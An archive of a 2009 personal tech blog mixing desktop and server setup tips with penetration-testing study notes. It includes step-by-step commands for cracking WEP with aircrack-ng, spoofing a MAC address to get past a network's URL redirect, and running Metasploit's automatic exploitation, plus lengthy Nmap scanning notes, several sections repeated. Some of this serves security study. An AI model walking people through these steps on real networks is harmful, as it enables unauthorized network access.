IV Needle: 2009

Wednesday, August 12, 2009

Tunnelling uTorrent

Setting up Putty

1. Open putty
2. Go to connection>ssh>tunnels
3. Enter a source port, select dynamic, and press add. This is going to be the port you send your uTorrent connection through
4. Do the normal jazz to establish a connection.

Settung up uTorrent

1. Open uTorrent
2. Go to options>preferences>connection
3. Change the following:
Type: Socks5
Proxy: localhost
Port: (The port you entered and tunneled in putty)
Resolve hostnames through proxy (check it)
Use proxy server for peer to peer connections (check it)
4. Press OK

I can't confirm that this encrypts all of the uTorrent traffic, but when I tried it behind a firewall it sure went a lot faster.

Override banned ports in Firefox about:config

Sometimes you need to allow an incoming connection through a specific port that Firefox is blocking. You can override this by following these steps:

Open Firefox
Type this into in the address bar: about:config
Accept the fate of your Firefox warranty
Right-click on the window
Select: New>String
Enter the preference name: network.security.ports.banned.override
The value will be the port you want to open for your browser (you can open it all of the way by entering 1-65535... however, I don't recommend this)
Test it out

Saturday, August 8, 2009

Gmail Reader in Enigma and Rainmeter

I ran into an issue with the Gmail Reader not working in Enigma and Rainmeter. After messing around with it for a while, I finally figured out that the skin doesn't play nice with special characters in the gmail password. Try changing your password to plain text in gmail and then reconfigure the skin with the new password. I'm not gong to promise this is only workaround, but it worked for me.

Wednesday, August 5, 2009

A Simple Hack for Clock Watchers

For those of you who enjoy knowing exactly how much time they have until they get to break away from work... here is a cool hack.

Here is how you do it using the Windows Sidebar:

Download and Run the Countdown Gadget
Go into the settings
Switch the Gadget Skin to "Original Skin"
Switch the Time Format to "Timer Style"
Change your Caption Text to what you want, I chose "until I go home."
Set your Count Down Date and Time to when you get off work
Bam... perfect clock watch

Weather Location ID for Rainmeter Apps

If you need to generate a location code for your Rainmeter config file (i.e. Taipei is TWXX0021), the link below will help you do so.

http://www.aspnetresources.com/tools/locid.aspx

The easy way to Take Screenshots

If you find your self taking screenshots and adding boxes and lines in mspaint, then check this program out its called Jing its a free tool from the screenshot masters at TechSmith. Jing has the ability to take full video or still captures of your screen, you can choose to select an area or the whole screen. When your finished capturing it lets you then edit the shot with Arrows and boxes to make spots more noticeable.

Click here for more info

Block quizzes from showing up in your Facebook Newsfeed

If you are as annoyed as I am with quizzes showing up in in your Facebook feed, there is a simple solution (aside from hide or blocking contacts). This only works in Firefox (I'm guessing that if you're still using Internet Explorer you're probably the person posting the quizzes anyway... so this doesn't apply).

Here are the steps:

Download the Greasemonkey Firefox Add-on
Download FB Purity by going to this page and clicking on the 'Install' button
Restart your browser and open Facebook
The quizzes should now be blocked

Defcon Media Archives

The great hacker archives:

https://www.defcon.org/html/links/defcon-media-archives.html

Tuesday, August 4, 2009

Bypass URL Redirects with MAC Spoofing

It's not difficult to bypass a URL redirect by spoofing the MAC address of an authorized computer. All you need is a laptop and Wireshark.

Here are the steps:

Boot to Linux and verify that your eth0 connection is enabled and connected to the network. You can check this my running: ifconfig
Next run wireshark
Click on the Start Capture button and then select the configuration button for you eth0 device
Create a filter that only captures Ethernet ARP packets
Start the capture
Wait until another computer connects to the network (this may take some time to get a machine that is authorized)
When they communicate with the server an ARP packet will be sent with that computers MAC address
Record the MAC address and stop the capture
Open a terminal
Type: macchanger --mac <copy the new MAC address here> eth0
Check that your MAC address is now the same as the other computer: ifconfig
Type: /etc/init.d/networking stop
Type: /etc/init.d/networking start
Open a browser and verify to that you now bypass the URL redirect and can now browse the internet

Friday, June 12, 2009

Pass the Hash Tutorial

http://www.ethicalhacker.net/content/view/249/1/

Metasploit db_autopwn

./msfconsole
db_create test
db_hosts
db_nmap IP ADDRESS TO TEST -p PORT
db_hosts
db_autopwn -t -p -e -s -b
sessions -l
sessions -i

Monday, June 8, 2009

Restore VISTA MBR (if the traditional methods are failing)

Download and install EasyBCD
Click on the Manage Bootloader button
Make sure "Reinstall the Vista Bootloader" is selected
Hit the "Write MBR" button
Re-start your machine

Your Vista Bootloader should be restored.

Saturday, June 6, 2009

Synaptic not showing all packages

On a fresh VMware install of Ubuntu 8.10 I ran into the problem where additional packages weren't showing up in the Synaptic Package Manager. I've seen this before and have previously been able to resolve it. Once and for all I'm going to blog the fix so I can find it for future reference.

Open up a terminal
Enter the command: sudo update-apt-xapian-index
Restart Synaptic Package Manager when the update is complete
You may need to reload the package information by clicking Ctrl-R
It should work fine now

Hope this can help other people annoyed by this problem.

Setup a Tomcat server in Ubuntu

Install the required packages (either using "apt-get install" in the terminal or from the package manager), then follow the instructions to configure it:

tomcat5.5
tomcat5.5-admin
tomcat5.5-webapps
sun-java6-jdk

Tomcat needs to know where the jdk is.
Open /etc/default/tomcat5.5 in a text editor.
Change the line that starts:

#JAVA_HOME.

to read:

JAVA_HOME=/usr/lib/jvm/java-6-sun

** This assumes that you have java 6 installed. Check that you have that folder.

Update the tomcat security policy:

sudo gedit /etc/tomcat5.5/policy.d/03catalina.policy

At the very end of the file, add the lines:

grant {
permission java.net.AllPermission;
permission java.net.SocketPermission "localhost:3306", "connect";
};

Next you need to import a .jar into your Tomcat. To do so go to http://dev.mysql.com/downloads/connector/j/5.1.html and download the tar file. When it asks if you have registered look below and where it says 'No Thanks'. Double click on the downloaded tar file and extract. Go into the newly created folder and run:

sudo cp mysql-connector-java-5.1.5-bin.jar /usr/share/tomcat5.5/server/lib/

This will copy that jar file into the library for jsp.

Restart your tomcat server:

sudo /etc/init.d/tomcat5.5 restart

Setup LAMP in Ubuntu

1. Install Apache2

Start the package manager by going to the menu: "System>Administration>Synaptic Package Manager"
Enter your password to allow the program to run.
Search for the package named "apache2" by clicking the search button on the menu bar.
Find the package named exactly "apache2"
Click the check box next to the package and choose "Mark for installation" from the pop up menu.
A window will appear asking if additional changes should be made. These are other packages that apache2 requires to function properly. Choose the button that says "Mark".
Apply the changes by clicking the "Apply" button from the menu
Note: You can select as many packages as you want before applying changes. For example you could install Apache2 at the same time as you install MySQL.

2. Install MySQL and PHP

Search for and install these packages from the package manager:

php5-mysql
mysql-server
mysql-client
phpmyadmin (installer will ask what server to connect to. Choose apache2.)
libapache2-mod-auth-mysql

3. Configure phpmyadmin

To set up under Apache all you need to do is include the following line in /etc/apache2/apache2.conf, first type the following command to open up this file:

sudo gedit /etc/apache2/apache2.conf

Add the following line of code inside apache2.conf:
Include /etc/phpmyadmin/apache.conf

Now restart Apache:
sudo /etc/init.d/apache2 restart

4. Test it out...
Open up a browser and type "http://127.0.1.1/" into the address bar. If a page comes up that says "It works!" your Apache server is running and configured. Now point to "http://127.0.1.1/phpmyadmin" and verify that the phpmyadmin page comes up.

Tuesday, June 2, 2009

Cracking WEP

I've looked at several different methods for cracking WEP... this is what worked for me:

Because my onboard wireless NIC does not support packet injection I used my wireless USB adapter to do this in BackTrack 4.

Setup your adapter:

Code:

airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

Start up Kismet from the command line and start collecting information (look for the WEP network you want to crack and record the channel, BSSID, and ESSID):

Code:

kismet

Open a new terminal session. Plug the values you collected from kismet into the command below (you may want to create and browse to a temporary directory because this will create several files that will dumped into the present working directory):

Code:

airodump-ng -c (channel) -w (filename) --bssid (BSSID) wlan0 --ivs

Next you'll want to create another terminal session and begin authentication with the router:

Code:

 aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h 00:11:22:33:44:55 wlan0

At this point open another terminal and begin packet injection (this should bump up your packet collection significantly):

Code:

aireplay-ng -3 -b (BSSID) -h 00:11:22:33:44:55 wlan0

The final step to the crack is simple. Point aircrack-ng to the .ivs file that airodump-ng created. It will process until there are enough packets collected and then give you the WEP key.

Code:

aircrack-ng -s /wep_router.ivs

This should do it... I'll tweak this as go to make it better. Feel free to give feedback if you have suggestions or changes.

Monday, June 1, 2009

BT4 and rausb0 (the driver I used in BT3)

After much trial, I finally figured out how to configure my USB wireless adapter that utilized the rausb0 driver in BackTrack 3. Since moving over to BackTrack 4 I haven't been able to use my external USB adapter.

Below is the command I was using with the resulting error:

root@bt:~# ifconfig rausb0 up
rausb0: ERROR while getting interface flags: No such device

I finally figured out that they have updated the driver for my Hawking device to use the wlan0 driver instead. I'm not sure how this works for other devices but it fixed my problem. New command:

root@bt:~# ifconfig wlan0 up
root@bt:~#

Success!

Saturday, May 30, 2009

Metasploit Quick Tutorial

>: /pentest/exploits/framework3
>: ./msfconsole
msf > use exploit/...
msf > set PAYLOAD ...
msf > set RHOST ...
msf > set RPORT ...
msf > set LHOST ...
msf > set LPORT ...
msf > exploit

BAM

Thursday, May 28, 2009

Trying out the new "Email-to-Post" blog feature

In theory, thanks to Google magic... this email will be posted on the blog.

Tuesday, May 26, 2009

Glass Firefox Extension

Sexy...

http://www.neowin.net/forum/index.php?showtopic=746714

Saturday, May 16, 2009

Nmap OS Fingerprinting

Active OS Fingerprinting (Gen1) - Nmap versions <>TCP Sequence Prediction

SYN packet to open port

NULL packet to open port

SYN|FIN|URG|PSH packet to open port

ACK packet to open port

SYN packet to closed port

ACK packet to closed port

FIN|PSH|URG packet to closed port

UDP packet to closed port

Nmap Gen2 Active OS Fingerprinting (> 30 different methods/tests, invoked with -O or -O2)

TCP ISN greatest common denominator (GCD)
TCP ISN counter rate (ISR)
TCP IP ID sequence generation algorithm (TI)
ICMP IP ID sequence generation algorithm (II)
Shared IP ID sequence boolean (SS)
TCP timestamp option algorithm (TS)
TCP initial window size (W, W1 - W6)
IP don’t fragment bit (DF)
IP initial time-to-live guess (TG)
Explicit congestion notification (CC)

Nmap Top Port Scan Performance Options

--host-timeout: (Asks Nmap to give up on hosts that take more than the given amount of time to scan)
--max-retries: (Specifies the maximum number of port scan probe retransmissions to a single port)
--min_rtt_timeout:, --max_rtt_timeout:, --initial_rtt_timeout: (Amount of time that Nmap will wait for a port scan probe response)
--min-rate, --max-rate (The min and max number of probe packets Nmap sends per second
--min_parallelism:, --max_parallelism: (Number of port scan probes (across all hosts scanned concurrently) that Nmap may have outstanding)
--scan_delay:, --max-scan-delay: (Amount of time between sending probes to any individual host (the scan delay can grow as Nmap detects packet loss, so a maximum may be specified)

Nmap Version Scanning (-sV)

When Nmap identifies an open port, it displays the default service commonly associated with that port (Based on list of about 2,200 services in nmap-services file)
What about services not on the list?
What about services on unexpected ports?(i.e. HTTP on T:90 or sshd on T:3322)
--version-trace (option shows probe details in real time)

Nmap Version Scanning Technique

NULL probe
- If port is TCP, Nmap connects to it and listens for roughly 5 seconds for initial welcome banner
- If data is received, it is compared to signatures in nmap-services-probes
Probable Port probes (share connection from 1.)
- All UDP ports and TCP ports that failed (or soft-matched) NULL probing
- Every probe has a list of probable port numbers
- Probes that match the port send a probe string to the port
- Responses are compared to regular expressions
Sequential Probes
- New connection for each probe (to avoid corrupting next probe)
- Uses ‘rarity’ metric to avoid trying probes that are extremely unlikely
SSL probes
- If Sequential Probes determine the target port is running SSL and if OpenSSL is available, Nmap connects back via SSL and restarts scan
Nmap RPC Grinder
- If generic probe identifies RPC-based service, Grinder brute-forces the RPC program number/name and supported version numbers

Nmap UDP Scans (-sU)

Scans generally slower and more difficult than TCP
Sends empty (no data) UDP header to target ports
ICMP response rate-limiting detection
- Closed ports typically respond ICMP Port Unreachable
- OS limits ICMP responses (Linux limits to 1/sec)
- Nmap slows down to avoid wasting packets
- 65,536-ports @ 1/sec > 18 hours for one host

Nmap Runtime Interaction

p = turn on packet tracing
v = increase verbosity
d = increase debugging level
Shift + [p,v,d] inverts
AnyOtherKey = print status message
- Elapsed time, # of hosts completed, # of hosts up, # of hosts currently being scanned
- % done, ETA remaining

Nmap Timing Options (-T)

Paranoid (0) - scan serially, wait 5min between packets
Sneaky (1) - scan serially, wait 15 seconds between packets
Polite (2) - scan serially, wait .4 seconds between packets
Normal (3) [def] - parallel scan, multiple packets to multiple ports at once
Aggressive (4) - parallel scan, max time per host 5 min, 1.25 seconds response time-out
Insane (5) - parallel scan, max time per host 75 seconds, 0.3 seconds response time-ou

TCP Idle Scan

1998…Security researcher Antirez (who also wrote hping2) posted to the Bugtraq mailing list
One way to determine whether a TCP port is open is to send a SYN packet to the port. The target machine will respond with a SYN/ACK packet if the port is open, and RST if the port is closed.
A machine that receives an unsolicited SYN/ACK packet will respond with a RST. An unsolicited RST will be ignored.
Every IP packet on the Internet has a fragment identification number (IPID). Since many operating systems simply increment this number for each packet they send, probing for the IPID can tell an attacker how many packets have been sent since the last probe.
Three cases ‘open’, ‘closed’, and ‘filtered’ port
The actors:
- The Attacker

- The Zombie

- The Target

Case 1: Open Port

Case 2: Closed Port

Case 3: Filtered Port

Nmap Idle Scans (-sI)

Find a suitable Zombie
- We didn't just choose a printer icon to represent a zombie in our illustrations to be funny—simple network devices often make great zombies because they are commonly both underused (idle) and built with simple network stacks which are vulnerable to IPID traffic detection.
Execute the scan
- Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest.

FTP Bounce Scan

RFC 959 October 1985 - File Transfer Protocol
DATA PORT (PORT)
“The argument is a HOST-PORT specification for the data port to be used in data connection. There are defaults for both the user and server data ports, and under normal circumstances this command and its reply are not needed. If this command is used, the argument is the concatenation of a 32-bit internet host address and a 16-bit TCP port address. This address information is broken into 8-bit fields and the value of each field is transmitted as a decimal number (in character string representation).
The fields are separated by commas.
A port command would be:
PORT h1,h2,h3,h4,p1,p2
where h1 is the high order 8 bits of the internet host address.”

FTP Bounce Scan (-b) with Nmap

-b [][:]@[:]
Most modern FTP servers have fixed this vulnerability, but many modern printers that support FTP have forwarding capabilities turned on by default

Nmap FTP Bounce Scans

Most common results of FTP bounce scan attempts

# nmap -PN -b ftp.microsoft.com google.com

Starting Nmap ( http://nmap.org )
Your FTP bounce server doesn’t allow privileged ports, skipping them.
Your FTP bounce servers sucks, it won’t let us feed bogs ports!

Successful FTP bounce scan

# nmap -p 22,25,135 -PN -v -b XXX.YY.111.2 scanme.nmap.org

Starting Nmap ( http://nmap.org )
Attempting connection to ftp://anonymous:-wwwuser@@XXX.YY.111.2:21
Connected:220 JD FTP Server Ready
Login credentials accepted by ftp server!
Initiating TCP ftp bounce scan against scanme.nmap.org (64.13.134.52)
Adding open port 22/tcp
Adding open port 25/tcp
Scanned 3 ports in 12 seconds via the Bounce scan.
Interesting ports on scanme.nmap.org (64.13.134.52):
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
135/tcp filtered msrpc

Nmap done: 1 IP address (1 host up) scanned in 21.79 seconds

Port Scanning with Nmap

-sT: Connect TCP scan (aka “polite”)
-sS: SYN scan (aka “half-open”)
- Harder to detect
- Much quicker
-sF, -sN, -sX: FIN, NULL, and Xmas scans
- RFC 793 p.65: “if the [destination] port state is CLOSED…an incoming segment not containing a RST causes a RST to be sent in response.” p.66 - regarding packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment and return.”
- Compliant systems respond to packets not containing SYN,RST, or ACK bits with RST if closed and no response if port is open
--scanflags: Custom Scan Types
- Any combination of URG, ACK, PSH, RST, SYN, and FIN
- Non-delimited list (URGACKPSHRSTSYNFIN)
-sA: TCP ACK scan
- Does not determine port state
- Useful to map firewall rulesets and whether they are stateful or not
- ‘open’ and ‘closed’ reachable ports reply RST = ‘unfiltered’
- ‘filtered’ ports don’t respond or send ICMP errors
-sW: Window TCP scan
- Same as ACK scan, however examines TCP Window value of RST
-sM: Maimon scan (FIN/ACK)
- Uriel Maimon (Phrack Magazine, Nov. 1996)

Port Selection Examples (-p | -F)

-p 22 (Scan a single port)
-p ssh (Specify port names rather than numbers)
-p 22,25,80 (Multiple ports seperated with commas (protocol determined by scan))
-p 80-85,443,8000-8005,8080-8085 (Ranges specified by [-] multiple ranges separated by [,])
-p -100,60000- (Can omit beginning or ending of range to imply ports 1 & T:65535 | U:255)
-p- (Omit beginning and end numbers to scan the entire range (excluding 0))
-pT:21,23,110,U:53,111,137,161 (For scans which include UDP and TCP types, port lists can specify ports for each protocol)
-p http* (Wildcards may be used to match ports with similar names (may need to shell-escape))
-p 1-1023,[1024-] (Enclosing a range in brackets causes those port numbers to be scanned only if they are registered in nmap-services)

Traceroute with Nmap

--traceroute
Determines what sort of probe will be most effective based on scan results
- ICMP | TCP specific port | UDP specific port
Sends probes in parallel
“goes backwards” for efficiency
Sends probe with high TTL based on guess derived from scan results so far and determines exact number of hops
- If response from end host, lowers TTL
- If ICMP Time Exceeded message, raises TTL

Sweeping with nmap

# nmap [options]
By default Nmap will ping targets before scanning them and only scan ‘up’
Sweep types:
-sP: Ping Scan (only)
-PN: Disable Ping
-PS: TCP SYN Ping (comma sep list)
-PA: TCP ACK Ping (requires priv)
-PU: UDP Ping
-PE,-PP,-PM: ICMP Ping Types [Echo (8/0), Timestamp (13/14), Address Mask (17/18)]
-PO: IP Protocol Ping [def ICMP+IGMP+IP-in-IP]
-PR: ARP Scan
Defaults:
Privileged Users: -PA+-PE | Local=-PR
Unprivileged: -PS

Scanning with nmap

Nmap Security Scanner

Developed by Fyodor, Nmap (“Network Mapper”) is free / open-source utility for network exploration or security auditing.
Linux Journal’s Editor’s Choice Award for Best Security Tool
LinuxQuestions.Org Security App of the Year award
- 1. Nmap (56.45%), 2. Snort (15.5%), 3. Nessus (14.9%)
Info World’s Best Information Security Product award
Codetalker Digest Security Product of the Year award

Sweeping with nmap

# nmap [options]
By default Nmap will ping targets before scanning them and only scan ‘up’
Sweep types:
-sP: Ping Scan (only)
-PN: Disable Ping
-PS: TCP SYN Ping (comma sep list)
-PA: TCP ACK Ping (requires priv)
-PU: UDP Ping
-PE,-PP,-PM: ICMP Ping Types [Echo (8/0), Timestamp (13/14), Address Mask (17/18)]
-PO: IP Protocol Ping [def ICMP+IGMP+IP-in-IP]
-PR: ARP Scan
Defaults:
Privileged Users: -PA+-PE | Local=-PR
Unprivileged: -PS

Traceroute with Nmap

--traceroute
Determines what sort of probe will be most effective based on scan results
- ICMP | TCP specific port | UDP specific port
Sends probes in parallel
“goes backwards” for efficiency
Sends probe with high TTL based on guess derived from scan results so far and determines exact number of hops
- If response from end host, lowers TTL
- If ICMP Time Exceeded message, raises TTL

Port Selection Examples (-p | -F)

-p 22 (Scan a single port)
-p ssh (Specify port names rather than numbers)
-p 22,25,80 (Multiple ports seperated with commas (protocol determined by scan))
-p 80-85,443,8000-8005,8080-8085 (Ranges specified by [-] multiple ranges separated by [,])
-p -100,60000- (Can omit beginning or ending of range to imply ports 1 & T:65535 | U:255)
-p- (Omit beginning and end numbers to scan the entire range (excluding 0))
-pT:21,23,110,U:53,111,137,161 (For scans which include UDP and TCP types, port lists can specify ports for each protocol)
-p http* (Wildcards may be used to match ports with similar names (may need to shell-escape))
-p 1-1023,[1024-] (Enclosing a range in brackets causes those port numbers to be scanned only if they are registered in nmap-services)

TCP Header (RFC 793 + 3168)

Port Scanning with Nmap

-sT: Connect TCP scan (aka “polite”)
-sS: SYN scan (aka “half-open”)
- Harder to detect
- Much quicker
-sF, -sN, -sX: FIN, NULL, and Xmas scans
- RFC 793 p.65: “if the [destination] port state is CLOSED…an incoming segment not containing a RST causes a RST to be sent in response.” p.66 - regarding packets sent to open ports without the SYN, RST, or ACK bits set: “you are unlikely to get here, but if you do, drop the segment and return.”
- Compliant systems respond to packets not containing SYN,RST, or ACK bits with RST if closed and no response if port is open
--scanflags: Custom Scan Types
- Any combination of URG, ACK, PSH, RST, SYN, and FIN
- Non-delimited list (URGACKPSHRSTSYNFIN)
-sA: TCP ACK scan
- Does not determine port state
- Useful to map firewall rulesets and whether they are stateful or not
- ‘open’ and ‘closed’ reachable ports reply RST = ‘unfiltered’
- ‘filtered’ ports don’t respond or send ICMP errors
-sW: Window TCP scan
- Same as ACK scan, however examines TCP Window value of RST
-sM: Maimon scan (FIN/ACK)
- Uriel Maimon (Phrack Magazine, Nov. 1996)

FTP Bounce Scan

RFC 959 October 1985 - File Transfer Protocol
DATA PORT (PORT)
“The argument is a HOST-PORT specification for the data port to be used in data connection. There are defaults for both the user and server data ports, and under normal circumstances this command and its reply are not needed. If this command is used, the argument is the concatenation of a 32-bit internet host address and a 16-bit TCP port address. This address information is broken into 8-bit fields and the value of each field is transmitted as a decimal number (in character string representation).
The fields are separated by commas.
A port command would be:
PORT h1,h2,h3,h4,p1,p2
where h1 is the high order 8 bits of the internet host address.”

FTP Bounce Scan (-b) with Nmap

-b [][:]@[:]
Most modern FTP servers have fixed this vulnerability, but many modern printers that support FTP have forwarding capabilities turned on by default

Nmap FTP Bounce Scans

Most common results of FTP bounce scan attempts

Successful FTP bounce scan

Find a suitable Zombie
- We didn't just choose a printer icon to represent a zombie in our illustrations to be funny—simple network devices often make great zombies because they are commonly both underused (idle) and built with simple network stacks which are vulnerable to IPID traffic detection.
Execute the scan
- Once a suitable zombie has been found, performing a scan is easy. Simply specify the zombie hostname to the -sI option and Nmap does the rest.
Example: # nmap -PN -p -sI [:src-port]

# nmap -PN -p- -sI kiosk.adobe.com www.riaa.com

Starting Nmap ( http://nmap.org )
Idlescan using zombie kiosk.adobe.com (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https
1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 2594.47 seconds

Nmap UDP Scans (-sU)

Scans generally slower and more difficult than TCP
Sends empty (no data) UDP header to target ports
ICMP response rate-limiting detection
- Closed ports typically respond ICMP Port Unreachable
- OS limits ICMP responses (Linux limits to 1/sec)
- Nmap slows down to avoid wasting packets
- 65,536-ports @ 1/sec > 18 hours for one host

Nmap Runtime Interaction

p = turn on packet tracing
v = increase verbosity
d = increase debugging level
Shift + [p,v,d] inverts
AnyOtherKey = print status message
- Elapsed time, # of hosts completed, # of hosts up, # of hosts currently being scanned
- % done, ETA remaining

Nmap Timing Options (-T)

Paranoid (0) - scan serially, wait 5min between packets
Sneaky (1) - scan serially, wait 15 seconds between packets
Polite (2) - scan serially, wait .4 seconds between packets
Normal (3) [def] - parallel scan, multiple packets to multiple ports at once
Aggressive (4) - parallel scan, max time per host 5 min, 1.25 seconds response time-out
Insane (5) - parallel scan, max time per host 75 seconds, 0.3 seconds response time-out

Nmap Top Port Scan Performance Options

--host-timeout: (Asks Nmap to give up on hosts that take more than the given amount of time to scan)
--max-retries: (Specifies the maximum number of port scan probe retransmissions to a single port)
--min_rtt_timeout:, --max_rtt_timeout:, --initial_rtt_timeout: (Amount of time that Nmap will wait for a port scan probe response)
--min-rate, --max-rate (The min and max number of probe packets Nmap sends per second
--min_parallelism:, --max_parallelism: (Number of port scan probes (across all hosts scanned concurrently) that Nmap may have outstanding)
--scan_delay:, --max-scan-delay: (Amount of time between sending probes to any individual host (the scan delay can grow as Nmap detects packet loss, so a maximum may be specified)

Nmap Version Scanning (-sV)

When Nmap identifies an open port, it displays the default service commonly associated with that port (Based on list of about 2,200 services in nmap-services file)
What about services not on the list?
What about services on unexpected ports?(i.e. HTTP on T:90 or sshd on T:3322)
--version-trace (option shows probe details in real time)

Nmap Version Scanning Technique

NULL probe
- If port is TCP, Nmap connects to it and listens for roughly 5 seconds for initial welcome banner
- If data is received, it is compared to signatures in nmap-services-probes
Probable Port probes (share connection from 1.)
- All UDP ports and TCP ports that failed (or soft-matched) NULL probing
- Every probe has a list of probable port numbers
- Probes that match the port send a probe string to the port
- Responses are compared to regular expressions
Sequential Probes
- New connection for each probe (to avoid corrupting next probe)
- Uses ‘rarity’ metric to avoid trying probes that are extremely unlikely
SSL probes
- If Sequential Probes determine the target port is running SSL and if OpenSSL is available, Nmap connects back via SSL and restarts scan
Nmap RPC Grinder
- If generic probe identifies RPC-based service, Grinder brute-forces the RPC program number/name and supported version numbers

Active OS Fingerprinting (Gen1) - Nmap versions < 4.51 include first-generation (-01)

TCP Sequence Prediction
SYN packet to open port
NULL packet to open port
SYN|FIN|URG|PSH packet to open port
ACK packet to open port
SYN packet to closed port
ACK packet to closed port
FIN|PSH|URG packet to closed port
UDP packet to closed port

Nmap Gen2 Active OS Fingerprinting (> 30 different methods/tests, invoked with -O or -O2)

TCP ISN greatest common denominator (GCD)
TCP ISN counter rate (ISR)
TCP IP ID sequence generation algorithm (TI)
ICMP IP ID sequence generation algorithm (II)
Shared IP ID sequence boolean (SS)
TCP timestamp option algorithm (TS)
TCP initial window size (W, W1 - W6)
IP don’t fragment bit (DF)
IP initial time-to-live guess (TG)
Explicit congestion notification (CC)

Outputing in terminal while writing to file...

After the write to file command, add ' & tail -f '

For example:

nmap -PS 192.192.0.0/16 > output.txt & tail -f output.txt

This will display the contents of your output file to the terminal as it is written.

Network Mapping / Tracing

Windows - tracert

Sends ICMP Echo Request
Small TTLs ++
C:\> tracert
-d: Don’t resolve names
-h [N]: Max hops (def 30)
-j [hostlist]: Loose source routing, sp-seperated
-w [N]: millisec * timeout (def 4000)

Linux/Unix - traceroute

UDP packets 33434++
Each hop measured 3x
# traceroute
-f [N]: TTL for first packet
-g [hostlist]: Loose source routing (8 hops max)
-I: use ICMP Echo Request
-m [N]: Max hops
-n: Don’t resolve names (use numbers)
-p [port]: Base UDP port
-w [N]: seconds * timeout (def 5)

Layer Four Traceroute (LFT) (v3.1 May 2008)

Linux / MacOS free
Windows GUI paid (Path Analyzer Pro)
Traverses many IDS/IPS
TCP/UDP/ICMP probes
$ lft [options] address
-d [port]: destination port (set to port FW allows)
-s [port]: source port
-E/e: Enable Adaptive engine (tries several TCP states to improve chances of success)
-A: displays ASNs (uses various whois servers)

TCP Initialization Sequence

TCP Connection Scenarios

TCP Connection Scenarios “filtered”

UDP Traffic Scenarios

UDP Traffic Scenarios "open|filtered"

Port inaccessible
Possible Reasons:
- Port is closed
- Firewall is blocking inbound UDP packet
- Firewall is blocking outbound response
- Port is open, but would only respond to specific data in the UDP payload
Ultimately…no way to know

Thursday, May 14, 2009

Visual Trace Tools... Sweetness

Visual traceroute using Google maps...

Network Tools by YouGetSignal.com

Kismet Options

This is a great resource for understanding Kismet's interface...

Kismet Main Page

Wednesday, May 13, 2009

Network Sweeping

ICMP-type8 Echo Requests ‘Pings’

Frequently blocked
Noisy + frequently monitored / signature

TCP packets to likely open ports

3-way initialization
Various possibilities
May traverse IDS/IPS

UDP packets to likely closed ports

ICMP Port Unreachable messages
Non-reliable

Angry IP Scanner (v2.21 Apr 04 / v3.0-beta4 Mar 09) [Some AV software may have signature]

v2.x - Windows-XP
- Standalone binary
v3.x - Cross-platform
- Requires Java
- Windows 2000/XP/Vista | MacOS X Intel/PPC | Linux
Threaded for each scanned IP
ICMP Echo Request sweep
TCP port scan
Gets MAC addresses
Gathers NetBIOS names and Workgroups

ICMPQuery (v1.0.3 2000) [Dave Andersen cs.ut.edu -> cs.cmu.edu]

CLI Linux/Unix
ICMP Timestamp (t13) and Address Mask Request (t17)

Tuesday, May 12, 2009

War Driving

2001... Peter Shipley
-Drove around Silicon Valley
-Discovered hundreds of APs
War Walking
War Flying
War Biking
War Chalking
All = War Driving (AKA 'stumbling')
http://www.wardriving.com/

Active Scanning

Sending probe packets
802.11 packets with ESSID of 'Any'
Response from WLAN access points

NetStumbler v0.4.0 (Apr 2004)

802.11a/b/g
MAC addresses
ESSID
Wireless channels
Signal strength
[IP addresses]
Wireless Security

Passive Listening

Wireless promiscuous mode
rfmon mode
vistarfmon (Josh Wright http://inguardians.com/tools/)
All wireless packets incl. mgmt frames

Wellenreiter (v1.9 Aug 2003) [Ger: wave runner / surfer]

Stealth ESSID broadcasts
Channel
MAC Addresses
Security
DHCP / ARP
-list of IPs
tcpdump compatible

Wellenreiter II (handhelds)

Kismet (v2008-05-R1 May 08)

802.11a/b/g + GPS mapping
tcpdump compatibility
Hidden SSID decloaking
Graphical network mapping
Mfgr/Model APs and clients
Known defaults detection

War Dialing

Numbers
Range: random, sequential, list
Nudging
Jamming
THC-Scan v2.1 (Oct 2005)

Scanning

War Dialing
War Driving
Sweeping
Mapping (tracing)
Port Scanning
OS Fingerprinting
Version Scanning
Vulnerability Scanning

Sunday, May 10, 2009

BT3 - USB Wireless HCL

Below is the list of wireless usb dongles and their compatibility with BackTrack3 from a VMware machine...

HCL:Wireless - Offensive-security.com

Friday, May 8, 2009

More Recon Tools

Sam Spade (by Steve Atkins)

Network query tool for Windows
Ping, DNS Lookup, Whois, DNS Zone Transfer, Traceroute, Finger, SMTP Verify, Mirror Website, Check Time, Keep-alive, etc.

Spiderfoot (by Steve Micallef)

Input domain name(s)
Crawls website(s) for links and subdomains
Reverse DNS lookups for IPs of findings + given block(s)
Whois lookups {www,mail}.domains.{com,us,etc}
Google searches with SOAP API

BiLE Suite

BiLE-weigh.pl ($ ./BiLE-weigh.pl [site_of_interest] [BiLE_output.mine]) - Comples weighting algorithm to determine 'related' score
tld-expand.pl - Over 250 TLDs and does DNS lookup
vet-IPrange.pl + vet-mx.pl - Are results of previous tools in defined range - (ex. What are the mail-servers for each domain?)
qtrace.pl - Uses hping to traceroute all target IPs - Outputs hop-by-hop paths to target

BiLE Recon Assembly-Line

BiLE -> Bile-weigh -> tld-expand -> vet-IPrange + vet-mx -> qtrace

BiLE DNS Tools

Jarf-rev - Input target network range - Output reverse DNS lookups for each address
Jarf-dnsbrute - Input domain + dictionary - Output DNS lookup for every sub-domain

Metadata

Info in Metadata

Includes MAC address, user names, edits, GPS info (depending on file format)

JPG
- EXIF (Exchangeable image file format)
- IPTC (International Press Telecommunications Council)
PDF
DOC
DOCX
EXE
XLS
XLSX
PNG
Etc

Metadata Tools

Recon Automation

Automating Google Recon

SiteDigger (v2.0 Released Jan 2005) [Win]
Wikto (v2.1 Released Dec 2008) [Win]
